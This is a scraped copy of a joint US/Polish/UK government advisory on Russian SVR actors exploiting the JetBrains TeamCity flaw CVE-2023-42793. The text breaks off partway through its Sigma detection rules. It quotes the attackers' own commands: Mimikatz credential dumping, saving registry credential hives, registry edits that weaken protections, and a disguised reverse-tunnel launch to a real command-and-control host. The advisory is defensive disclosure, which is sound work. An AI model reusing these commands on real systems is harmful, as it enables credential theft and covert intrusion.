{ "id": "5f56ec63-d5bf-41a0-ab66-4c02829e3aac", "created_at": "2026-04-06T00:13:04.65369Z", "updated_at": "2026-04-10T03:37:50.156246Z", "deleted_at": null, "sha1_hash": "a90da8d6f7f0c84257a2dc2fdd6f05c86b48bd8f", "title": "Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 332085, "plain_text": "Russian Foreign Intelligence Service (SVR) Exploiting JetBrains\r\nTeamCity CVE Globally | CISA\r\nPublished: 2023-12-13 · Archived: 2026-04-05 14:27:46 UTC\r\nSUMMARY\r\nThe U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity \u0026 Infrastructure Security Agency (CISA),\r\nU.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska\r\n(CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service\r\n(SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and\r\nNOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting\r\nJetBrains TeamCity software since September 2023.\r\nSoftware developers use TeamCity software to manage and automate software compilation, building, testing, and\r\nreleasing. If compromised, access to a TeamCity server would provide malicious actors with access to that\r\nsoftware developer’s source code, signing certificates, and the ability to subvert software compilation and\r\ndeployment processes—access a malicious actor could further use to conduct supply chain operations. Although\r\nthe SVR used such access to compromise SolarWinds and its customers in 2020, limited number and seemingly\r\nopportunistic types of victims currently identified, indicate that the SVR has not used the access afforded by the\r\nTeamCity CVE in a similar manner. The SVR has, however, been observed using the initial access gleaned by\r\nexploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take\r\nother steps to ensure persistent and long-term access to the compromised network environments.\r\nTo bring Russia’s actions to public attention, the authoring agencies are providing information on the SVR’s most\r\nrecent compromise to aid organizations in conducting their own investigations and securing their networks,\r\nprovide compromised entities with actionable indicators of compromise (IOCs), and empower private sector\r\ncybersecurity companies to better detect and counter the SVR’s malicious actions. The authoring agencies\r\nrecommend all organizations with affected systems that did not immediately apply available patches or\r\nworkarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA. If\r\npotential compromise is detected, administrators should apply the incident response recommendations included in\r\nthis CSA and report key findings to the FBI and CISA.\r\nDownload the PDF version of this report:\r\nFor a downloadable copy of IOCs, see:\r\nTHREAT OVERVIEW\r\nSVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013,\r\ncybersecurity companies and governments have reported on SVR operations targeting victim networks to steal\r\nconfidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 1 of 25\n\npattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia\r\nencompasses information on the politics, economics, and military of foreign states; science and technology; and\r\nforeign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable\r\nfuture cyber operations.\r\nA decade ago, public reports about SVR cyber activity focused largely on the SVR’s spear phishing operations,\r\ntargeting government agencies, think tanks and policy analysis organizations, educational institutions, and\r\npolitical organizations. This category of targeting is consistent with the SVR’s responsibility to collect political\r\nintelligence, the collection of which has long been the SVR’s highest priority. For the Russian Government,\r\npolitical intelligence includes not only the development and execution of foreign policies, but also the\r\ndevelopment and execution of domestic policies and the political processes that drive them. In December 2016,\r\nthe U.S. Government published a Joint Analysis Report titled “GRIZZLY STEPPE – Russian Malicious Cyber\r\nActivity,” which describes the SVR’s compromise of a U.S. political party leading up to a presidential election.\r\nThe SVR’s use of spear phishing operations are visible today in its ongoing Diplomatic Orbiter campaign,\r\nprimarily targeting diplomatic agencies. In 2023, SKW and CERT.PL published a Joint Analysis Report describing\r\ntools and techniques used by the SVR to target embassies in dozens of countries.\r\nLess frequently, reporting on SVR cyber activity has addressed other aspects of the SVR’s foreign intelligence\r\ncollection mission. In July 2020, U.S., U.K., and Canadian Governments jointly published an advisory revealing\r\nthe SVR’s exploitation of CVEs to gain initial access to networks, and its deployment of custom malware known\r\nas WellMess, WellMail, and Sorefang to target organizations involved in COVID-19 vaccine\r\ndevelopment. Although not listed in the 2020 advisory did not mention it, the authoring agencies can now disclose\r\nthat the SVR’s WellMess campaign also targeted energy companies. Such biomedical and energy targets are\r\nconsistent with the SVR’s responsibility to support the Russian economy by pursuing two categories of foreign\r\nintelligence known as economic intelligence and science and technology.\r\nIn April 2021, the U.S. Government attributed a supply chain operation targeting the SolarWinds information\r\ntechnology company and its customers to the SVR. This attribution marked the discovery that the SVR had, since\r\nat least 2018, expanded the range of its cyber operations to include the widespread targeting of information\r\ntechnology companies. At least some of this targeting was aimed at enabling additional cyber operations.\r\nFollowing this attribution, the U.S. and U.K. Governments published advisories highlighting additional SVR\r\nTTPs, including its exploitation of various CVEs, the SVR’s use of “low and slow” password spraying techniques\r\nto gain initial access to some victims’ networks, exploitation of a zero-day exploit, and exploitation of Microsoft\r\n365 cloud environments.\r\nIn this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues\r\nits practice of targeting technology companies. By choosing to exploit CVE-2023-42793, a software development\r\nprogram, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the\r\nthreat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE\r\nin mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable\r\nTeamCity servers. While the authoring agencies assess the SVR has not yet used its accesses to software\r\ndevelopers to access customer networks and is likely still in the preparatory phase of its operation, having access\r\nto these companies’ networks presents the SVR with opportunities to enable hard-to- detect command and control\r\n(C2) infrastructure.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 2 of 25\n\nTECHNICAL DETAILS\r\nNote: This advisory uses the MITRE ATT\u0026CK® for Enterprise framework, version 14. See the MITRE\r\nATT\u0026CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT\u0026CK®\r\ntactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT\u0026CK framework,\r\nsee CISA and MITRE ATT\u0026CK’s Best Practices for MITRE ATT\u0026CK Mapping and CISA’s Decider Tool .\r\nWhile SVR followed a similar playbook in each compromise, they also adjusted to each operating environment\r\nand not all presented steps or actions below were executed on every host.\r\nInitial Access - Exploitation\r\nThe SVR started to exploit Internet-connected JetBrains TeamCity servers [T1190 ] in late September 2023\r\nusing CVE-2023-42793, which enables the insecure handling of specific paths allowing for bypassing\r\nauthorization, resulting in arbitrary code execution on the server. The authoring agencies' observations show that\r\nthe TeamCity exploitation usually resulted in code execution [T1203 ] with high privileges granting the SVR an\r\nadvantageous foothold in the network environment. The authoring agencies are not currently aware of any other\r\ninitial access vector to JetBrains TeamCity currently being exploited by the SVR.\r\nHost Reconnaissance\r\nInitial observations show the SVR used the following basic, built-in commands to perform host reconnaissance\r\n[T1033 ],[T1059.003 ],[T1592.002 ]:\r\nwhoami /priv\r\nwhoami /all\r\nwhoami /groups\r\nwhoami /domain\r\nnltest -dclist\r\nnltest -dsgetdc\r\ntasklist\r\nnetstat\r\nwmic /node:\"\"\u003credacted\u003e\"\" /user:\"\"\u003credacted\u003e\"\" /password:\"\"\u003credacted\u003e\"\" process list brief\r\nwmic /node:\"\"\u003credacted\u003e\"\" process list brief\r\nwmic process get commandline -all\r\nwmic process \u003cproc_id\u003e get commandline\r\nwmic process where name=\"\"GoogleCrashHandler64.exe\"\" get commandline,processed\r\npowershell ([adsisearcher]\"((samaccountname=\u003credacted\u003e))\").Findall().Properties\r\npowershell ([adsisearcher]\"((samaccountname=\u003credacted\u003e))\").Findall().Properties.memberof\r\npowershell Get-WmiObject -Class Win32_Service -Computername\r\npowershell Get-WindowsDriver -Online -All\r\nFile Exfiltration\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 3 of 25\n\nAdditionally, the authoring agencies have observed the SVR exfiltrating files [T1041 ] which may provide\r\ninsight into the host system’s operating system:\r\nC:\\Windows\\system32\\ntoskrnl.exe to precisely identify system version, likely as a prerequisite to deploy\r\nEDRSandBlast.\r\nSQL Server executable files - based on the review of the post exploitation actions, the SVR showed an\r\ninterest in specific files of the SQL Server installed on the compromised systems:\r\nC:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqlmin.dll,\r\nC:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqllos.dll,\r\nC:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqllang.dll,\r\nC:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqltses.dll\r\nC:\\Program Files\\Microsoft SQL\r\nServer\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\secforwarder.dll\r\nVisual Studio files – based on the review of the post exploitation actions, the SVR showed an interest in\r\nspecific files of the Visual Studio:\r\nC:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\SQL\\Common7\\IDE\\VSIXAutoUpdate.exe\r\nUpdate management agent files – based on the review of the post exploitation actions, the SVR\r\nshowed an interest in executables and configuration of patch management software:\r\nC:\\Program Files (x86)\\PatchManagementInstallation\\Agent\\12\\Httpd\\bin\\httpd.exe\r\nC:\\Program Files (x86)\\PatchManagementInstallation\\Agent\\12\\Httpd\r\nC:\\ProgramData\\GFI\\LanGuard 12\\HttpdConfig\\httpd.conf\r\nInterest in SQL Server\r\nBased on the review of the exploitation, the SVR also showed an interest in details of the SQL Server [T1059.001\r\n],[T1505.001 ]:\r\npowershell Compress-Archive -Path \"C:\\Program Files\\Microsoft SQL\r\nServer\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqlmin.dll\",\"C:\\Program Files\\Microsoft SQL\r\nServer\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqllos.dll\",\"C:\\Program Files\\Microsoft SQL\r\nServer\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqllang.dll\",\"C:\\Program Files\\Microsoft SQL\r\nServer\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqltses.dll\" -DestinationPath\r\nC:\\Windows\\temp\\1\\sql.zip\r\nSVR cyber actors also exfiltrated secforwarder.dll\r\nTactics Used to Avoid Detection\r\nTo avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068 ] technique to disable or\r\noutright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001 ].\r\nThis was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the\r\nSVR using EDRSandBlast to remove protected process light (PPL) protection, which is used for controlling and\r\nprotecting running processes and protecting them from infection. The actors then inject code into AV/EDR\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 4 of 25\n\nprocesses for a small subset of victims [T1068 ]. Additionally, executables that are likely to be detected (i.e.\r\nMimikatz) were executed in memory [T1003.001 ].\r\nIn several cases SVR attempted to hide their backdoors via:\r\nAbusing a DLL hijacking vulnerability in Zabbix software by replacing a legitimate Zabbix DLL with their\r\none containing GraphicalProton backdoor,\r\nBackdooring an open source application developed by Microsoft named vcperf. SVR modified and copied\r\npublicly available sourcecode. After execution, backdoored vcperf dropped several DLLs to disc, one of\r\nthose being a GraphicalProton backdoor,\r\nAbusing a DLL hijacking vulnerability in Webroot antivirus software by replacing a legitimate DLL with\r\none containing GraphicalProton backdoor.\r\nTo avoid detection by network monitoring, the SVR devised a covert C2 channel that used Microsoft OneDrive\r\nand Dropbox cloud services. To further enable obfuscation, data exchanged with malware via OneDrive and\r\nDropbox were hidden inside randomly generated BMP files [T1564 ], illustrated below:\r\nPrivilege Escalation\r\nTo facilitate privilege escalation [T1098 ], the SVR used multiple techniques, including WinPEAS, NoLMHash\r\nregistry key modification, and the Mimikatz tool.\r\nThe SVR modified the NoLMHash registry using the following reg command:\r\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v NoLMHash /t\r\nREG_DWORD /d \"0\" /f\r\nThe SVR used the following Mimikatz commands [T1003 ]:\r\nprivilege::debug\r\nlsadump::cache\r\nlsadump::secrets\r\nlsadump::sam\r\nsekurlsa::logonpasswords\r\nPersistence\r\nThe SVR relied on scheduled tasks [T1053.005 ] to secure persistent execution of backdoors. Depending on the\r\nprivileges the SVR had, their executables were stored in one of following directories:\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 5 of 25\n\nC:\\Windows\\temp\r\nC:\\Windows\\System32\r\nC:\\Windows\\WinStore\r\nThe SVR made all modifications using the schtasks.exe binary. It then had multiple variants of arguments passed\r\nto schtasks.exe, which can be found in Appendix B – Indicators of Compromise.\r\nTo secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets\r\n(TGTs) [T1558.001 ].\r\nSensitive Data Exfiltration [T1020 ]\r\nThe SVR exfiltrated the following Windows Registry hives from its victims [T1003 ]:\r\nHKLM\\SYSTEM\r\nHKLM\\SAM\r\nHKLM\\SECURITY\r\nIn order to exfiltrate Windows Registry, the SVR saved hives into files [T1003.002 ], packed them, and then\r\nexfiltrated them using a backdoor capability. it used “reg save” to save SYSTEM, SAM and SECURITY registry\r\nhives, and used powershell to stage .zip archives in the C:\\Windows\\Temp\\ directory.\r\nreg save HKLM\\SYSTEM \"\"C:\\Windows\\temp\\1\\sy.sa\"\" /y\r\nreg save HKLM\\SAM \"\"C:\\Windows\\temp\\1\\sam.sa\"\" /y\r\nreg save HKLM\\SECURITY \"\"C:\\Windows\\temp\\1\\se.sa\"\" /y\r\npowershell Compress-Archive -Path C:\\Windows\\temp\\1\\ -DestinationPath C:\\Windows\\temp\\s.zip -Force\r\n\u0026 del C:\\Windows\\temp\\1 /F /Q\r\nIn a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session\r\ncookies, browsing history, or saved logins.\r\nSVR also used DSInternals open source tool to interact with Directory Services. DSInternals allows to obtain a\r\nsensitive Domain information.\r\nNetwork Reconnaissance\r\nAfter the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on\r\nnetwork reconnaissance [T1590.004 ]. The SVR performed network reconnaissance using a mix of built-in\r\ncommands and additional tools, such as port scanner and PowerSploit, which it launched into memory [T1046 ].\r\nThe SVR executed the following PowerSploit commands:\r\nGet-NetComputer\r\nGet-NetGroup\r\nGet-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset,\r\nlogoncount, badpwdcount\"\r\nGet-NetDiDomain\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 6 of 25\n\nGet-AdUser\r\nGet-DomainUser -UserName\r\nGet-NetUser -PreauthNotRequire\r\nGet-NetComputer | select samaccountname\r\nGet-NetUser -SPN | select serviceprincipalname\r\nTunneling into Compromised Environments\r\nIn selected environments the SVR used an additional tool named, “rr.exe”—a modified open source reverse socks\r\ntunneler named Rsockstun—to establish a tunnel to the C2 infrastructure [T1572 ].\r\nThe authoring agencies are aware of the following infrastructure used in conjunction with “rr.exe”:\r\n65.20.97[.]203:443\r\nPoetpages[.]com:8443\r\nThe SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command\r\nLine (WMIC) [T1047 ] utility after dropping it to disk:\r\nwmic process call create \"C:\\Program Files\\Windows Defender Advanced Threat Protection\\Sense.exe -\r\nconnect poetpages.com -pass M554-0sddsf2@34232fsl45t31\"\r\nLateral Movement\r\nThe SVR used WMIC to facilitate lateral movement [T1047 ],[T1210 ].\r\nwmic /node:\"\"\u003credacted\u003e\"\" /user:\"\"\u003credacted\u003e\" /password:\"\"\u003credacted\u003e\"\" process call create \"\"rundll32\r\nC:\\Windows\\system32\\AclNumsInvertHost.dll AclNumsInvertHost\"\"\r\nThe SVR also modified DisableRestrictedAdmin key to enable remote connections [T1210 ].\r\nIt modified Registry using the following reg command:\r\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v\r\nDisableRestrictedAdmin /t REG_DWORD /d \"0\" /f\r\nAdversary Toolset\r\nIn the course of the TeamCity operation, the SVR used multiple custom and open source available tools and\r\nbackdoors. The following custom tools were observed in use during the operation:\r\nGraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs\r\n[T1027.001 ] to exchange data with the SVR operator.\r\nAfter execution, GraphicalProton gathers environment information such as active TCP/UDP connections\r\n[T1049 ], running processes [T1049 ], as well as user, host, and domain names [T1590 ]. OneDrive is\r\nused as a primary communication channel while Dropbox is treated as a backup channel [T1567 ]. API\r\nkeys are hardcoded into the malware. When communicating with cloud services,\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 7 of 25\n\nGraphicalProton generates a randomly named directory which is used to store infection-specific BMP files\r\n- with both commands and results [T1564.001 ]. Directory name is re-randomized each time the\r\nGraphicalProton process is started.\r\nBMP files that were used to exchange data were generated in the following way:\r\n1. Compress data using zlib,\r\n2. Encrypt data using custom algorithm,\r\n3. Add “***” string literal to encrypted data,\r\n4. Create a random BMP with random rectangle,\r\n5. And finally, encode encrypted data within lower pixel bits.\r\nWhile the GraphicalProton backdoor has remained mostly unchanged over the months we have been tracking it, to\r\navoid detection the adversary wrapped the tool in various different layers of obfuscation, encryption, encoders,\r\nand stagers. Two specific variants of GraphicalProton “packaging” are especially noteworthy – a variant that uses\r\nDLL hijacking [T1574.002 ] in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf [T1036 ], an open-source C++ build analysis tool\r\nfrom Microsoft.\r\nGraphicalProton HTTPS variant – a variant of GraphicalProton backdoor recently introduced by the\r\nSVR that forgoes using cloud-based services as a C2 channel and instead relies on HTTP request.\r\nTo legitimize the C2 channel, SVR used a re-registered expired domain set up with dummy WordPress\r\nwebsite. Execution of HTTPS variant of GraphicalProton is split into two files – stager and encrypted\r\nbinary file that contains further code.\r\nMITRE ATT\u0026CK TACTICS AND TECHNIQUES\r\nSee below tables for all referenced threat actor tactics and techniques in this advisory. For additional mitigations,\r\nsee the Mitigations section.\r\nTable 1: SVR Cyber Actors ATT\u0026CK Techniques for Enterprise - Reconnaissance\r\nTechnique Title ID Use\r\nGather Victim Network\r\nInformation: Network Topology\r\nT1590.004\r\nSVR cyber actors may gather information about the\r\nvictim’s network topology that can be used during\r\ntargeting.\r\nGather Victim Host Information:\r\nSoftware\r\nT1592.002 SVR cyber actors may gather information about the\r\nvictim’s host networks that can be used during targeting.\r\nTable 2: SVR Cyber Actors’ ATT\u0026CK Techniques for Enterprise – Initial Access\r\nTechnique Title ID Use\r\nExploit Public-Facing\r\nApplication\r\nT1190 SVR cyber actors exploit internet-connected JetBrains TeamCity\r\nserver using CVE-2023-42793 for initial access.\r\nTable 3: SVR Cyber Actors’ ATT\u0026CK Techniques for Enterprise: Execution\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 8 of 25\n\nTechnique Title ID Use\r\nCommand and\r\nScripting Interpreter:\r\nPowerShell\r\nT1059.001 SVR cyber actors used powershell commands to compress\r\nMicrosoft SQL server .dll files.\r\nCommand and\r\nScripting Interpreter:\r\nWindows Command\r\nShell\r\nT1059.003\r\nSVR cyber actors execute these powershell commands to perform\r\nhost reconnaissance:\r\npowershell ([adsisearcher]\"((samaccountname=\r\n\u003credacted\u003e))\").Findall().Properties\r\npowershell ([adsisearcher]\"((samaccountname=\r\n\u003credacted\u003e))\").Findall().Properties.memberof\r\npowershell Get-WmiObject -Class Win32_Service -\r\nComputername\r\npowershell Get-WindowsDriver -Online -All\r\nExploitation for Client\r\nExecution\r\nT1203\r\nSVR cyber actors leverage arbitrary code execution after exploiting\r\nCVE-2023-42793.\r\nHijack Execution Flow:\r\nDLL Side-Loading\r\nT1574.002 SVR cyber actors use a variant of GraphicalProton that uses DLL\r\nhijacking in Zabbix as a means to start execution.\r\nTable 4: SVR Cyber Actors’ ATT\u0026CK Techniques for Enterprise: Persistence\r\nTechnique Title ID Use\r\nScheduled Task\r\nT1053.005\r\nSVR cyber actors may abuse Windows Task Schedule to perform\r\ntask scheduling for initial or recurring execution of malicious\r\ncode.\r\nServer Software\r\nComponent: SQL Stored\r\nProcedures\r\nT1505.001 SVR cyber actors abuse SQL server stored procedures to maintain\r\npersistence.\r\nBoot or Logon Autostart\r\nExecution\r\nT1547\r\nSVR cyber actors used C:\\Windows\\system32\\ntoskrnl.exe to\r\nconfigure automatic system boot settings to maintain persistence.\r\nTable 5: SVR Cyber Actors’ ATT\u0026CK Techniques for Enterprise: Privilege Escalation\r\nTechnique Title ID Use\r\nExploitation for\r\nPrivilege Escalation\r\nT1068\r\nSVR cyber actors exploit JetBrains TeamCity vulnerability to achieve\r\nescalated privileges.\r\nTo avoid detection, the SVR cyber actors used a “Bring Your Own\r\nVulnerable Driver”  technique to disable EDR and AV defense\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 9 of 25\n\nTechnique Title ID Use\r\nmechanisms.\r\nAccount Manipulation\r\nT1098 SVR cyber actors may manipulate accounts to maintain and/or elevate\r\naccess to victim systems.\r\nTable 6: SVR Cyber Actors’ ATT\u0026CK Techniques for Enterprise: Defense Evasion\r\nTechnique Title ID Use\r\nObfuscated Files or\r\nInformation: Binary\r\nPadding\r\nT1027.001 SVR cyber actors use BMPs to perform binary padding while\r\nexchange data is exfiltrated to an their C2 station.\r\nMasquerading T1036\r\nSVR cyber actors use a variant that uses DLL hijacking in Zabbix as\r\na means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf, an\r\nopen-source C++ build analysis tool from Microsoft.\r\nProcess Injection T1055\r\nSVR cyber actors inject code into AV and EDR processes to evade\r\ndefenses.\r\nDisable or Modify\r\nTools\r\nT1562.001 SVR cyber actors may modify and/or disable tools to avoid possible\r\ndetection of their malware/tools and activities.\r\nHide Artifacts T1564\r\nSVR cyber actors may attempt to hide artifacts associated with their\r\nbehaviors to evade detection.\r\nHide Artifacts:\r\nHidden Files and\r\nDirectories\r\nT1564.001\r\nWhen communicating with cloud services, GraphicalProton\r\ngenerates a randomly named directory which is used to store\r\ninfection-specific BMP files - with both commands and results.\r\nTable 7: SVR Cyber actors’ ATT\u0026CK Techniques for Enterprise: Credential Access\r\nTechnique Title ID Use\r\nOS Credential Dumping:\r\nLSASS Memory\r\nT1003.001 SVR cyber actors executed Mimikatz commands in memory to\r\ngain access to credentials stored in memory.\r\nOS Credential Dumping:\r\nSecurity Account\r\nManager\r\nT1003.002\r\nSVR cyber actors used:\r\nprivilege::debug\r\nlsadump::cache\r\nlsadump::secrets\r\nlsadump::sam\r\nsekurlsa::logonpasswords\r\nMimikatz commands to gain access to credentials.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 10 of 25\n\nTechnique Title ID Use\r\nAdditionally, SVR cyber actors exfiltrated Windows registry\r\nhives to steal credentials.\r\nHKLM\\SYSTEM\r\nHKLM\\SAM\r\nHKLM\\SECURITY\r\nCredentials from\r\nPassword Stores:\r\nCredentials from Web\r\nBrowsers\r\nT1555.003\r\nIn a few specific cases, the SVR used the SharpChromium tool\r\nto obtain sensitive browser data such as session cookies,\r\nbrowsing history, or saved logins.\r\nSteal or Forge Kerberos\r\nTickets: Golden Ticket\r\nT1558.001 To secure long-term access to the environment, the SVR used the\r\nRubeus toolkit to craft Ticket Granting Tickets (TGTs).\r\nTable 8: SVR Cyber Actors ATT\u0026CK Techniques for Enterprise: Discovery\r\nTechnique Title ID Use\r\nSystem Owner/User\r\nDiscovery\r\nT1033\r\nSVR cyber actors use these built-in commands to perform host\r\nreconnaissance: whoami /priv, whoami / all, whoami / groups, whoami /\r\ndomain to perform user discovery.\r\nNetwork Service\r\nDiscovery\r\nT1046 SVR cyber actors performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit.\r\nProcess Discovery\r\nT1057\r\nSVR cyber actors use GraphicalProton to gather running processes data.\r\nGather Victim\r\nNetwork\r\nInformation\r\nT1590 SVR cyber actors use GraphicalProton to gather victim network\r\ninformation.\r\nTable 9: SVR Cyber Actors ATT\u0026CK Techniques for Enterprise: Lateral Movement\r\nTechnique Title ID Use\r\nExploitation of Remote\r\nServices\r\nT1210 SVR cyber actors may exploit remote services to gain unauthorized\r\naccess to internal systems once inside a network.\r\nWindows Management\r\nInstrumentation\r\nT1047\r\nSVR cyber actors executed Rsockstun either in memory or using\r\nWindows Management Instrumentation (WMI) to execute malicious\r\ncommands and payloads.\r\nwmic process call create \"C:\\Program Files\\Windows Defender\r\nAdvanced Threat Protection\\Sense.exe -connect poetpages.com -pass\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 11 of 25\n\nTechnique Title ID Use\r\nM554-0sddsf2@34232fsl45t31\"\r\nTable 10: SVR Cyber Actors ATT\u0026CK Techniques for Enterprise: Command and Control\r\nTechnique\r\nTitle\r\nID Use\r\nDynamic\r\nResolution\r\nT1568 SVR may dynamically establish connections to command-and-control\r\ninfrastructure to evade common detections and remediations.\r\nProtocol\r\nTunneling\r\nT1572\r\nSVR cyber actors may tunnel network communications to and from a victim\r\nsystem within a separate protocol to avoid detection/network filtering and/or\r\nenable access to otherwise unreachable systems.\r\nIn selected environments, the SVR used an additional tool named, “rr.exe”—a\r\nmodified open source reverse socks tunneler named Rsockstunm—to establish a\r\ntunnel to the C2 infrastructure.\r\nTable 11: SVR Cyber Actors ATT\u0026CK Techniques for Enterprise: Exfiltration\r\nTechnique Title ID Use\r\nAutomated\r\nExfiltration\r\nT1020 SVR cyber actors may exfiltrate data, such as sensitive documents, through\r\nthe use of automated processing after being gathered during collection.\r\nExfiltration Over\r\nC2 Channel\r\nT1041\r\nSVR cyber actors may steal data by exfiltrating it over an existing C2\r\nchannel. Stolen data is encoded into normal communications using the same\r\nprotocol as C2 communications.\r\nExfiltration Over\r\nWeb Service\r\nT1567 SVR cyber actors use OneDrive and Dropbox to exfiltrate data to their C2\r\nstation.\r\nINDICATORS OF COMPROMISE\r\nNote: Please refer to Appendix B for a list of IOCs.\r\nVICTIM TYPES\r\nAs a result of this latest SVR cyber activity, the FBI, CISA, NSA, SKW, CERT Polska, and NCSC have identified\r\na few dozen compromised companies in the United States, Europe, Asia, and Australia, and are aware of over a\r\nhundred compromised devices though we assess this list does not represent the full set of compromised\r\norganizations. Generally, the victim types do not fit into any sort of pattern or trend, aside from having an\r\nunpatched, Internet-reachable JetBrains TeamCity server, leading to the assessment that SVR’s exploitation of\r\nthese victims’ networks was opportunistic in nature and not necessarily a targeted attack. Identified victims\r\nincluded: an energy trade association; companies that provide software for billing, medical devices, customer care,\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 12 of 25\n\nemployee monitoring, financial management, marketing, sales, and video games; as well as hosting companies,\r\ntools manufacturers, and small and large IT companies.\r\nDETECTION METHODS\r\nThe following rules can be used to detect activity linked to adversary activity. These rules should serve as\r\nexamples and adapt to each organization’s environment and telemetry.\r\nSIGMA Rules\r\ntitle: Privilege information listing via whoami\r\ndescription: Detects whoami.exe execution and listing of privileges\r\nauthor:\r\nreferences: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami\r\ndate: 2023/11/15\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection:\r\n Image|endswith:\r\n - 'whoami.exe'\r\n CommandLine|contains:\r\n - 'priv'\r\n - 'PRIV'\r\n condition: selection\r\nfalsepositives: legitimate use by system administrator\r\ntitle: DC listing via nltest\r\ndescription: Detects nltest.exe execution and DC listing\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection:\r\n Image|endswith:\r\n - 'nltest.exe'\r\n CommandLine|re: '.*dclist\\:.*|.*DCLIST\\:.*|.*dsgetdc\\:.*|.*DSGETDC\\:.*'\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 13 of 25\n\ncondition: selection\r\nfalsepositives: legitimate use by system administrator\r\ntitle: DLL execution via WMI\r\ndescription: Detects DLL execution via WMI\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection:\r\n Image|endswith:\r\n - 'WMIC.exe'\r\n CommandLine|contains|all:\r\n - 'call'\r\n - 'rundll32'\r\n condition: selection\r\nfalsepositives: legitimate use by software or system administrator\r\ntitle: Process with connect and pass as args\r\ndescription: Process with connect and pass as args\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection:\r\n CommandLine|contains|all:\r\n - 'pass'\r\n - 'connect'\r\n condition: selection\r\nfalsepositives: legitimate use of rsockstun or software with exact same arguments\r\ntitle: Service or Drive enumeration via powershell\r\ndescription: Service or Drive enumeration via powershell\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 14 of 25\n\ncategory: ps_script\r\nproduct: windows\r\ndetection:\r\n selection_1:\r\n ScriptBlockText|contains|all:\r\n - 'Get-WmiObject'\r\n - '-Class'\r\n - 'Win32_Service'\r\n selection_2:\r\n ScriptBlockText|contains|all:\r\n - 'Get-WindowsDriver'\r\n - '-Online'\r\n - '-All'\r\n condition: selection_1 or selection_2\r\nfalsepositives: legitimate use by system 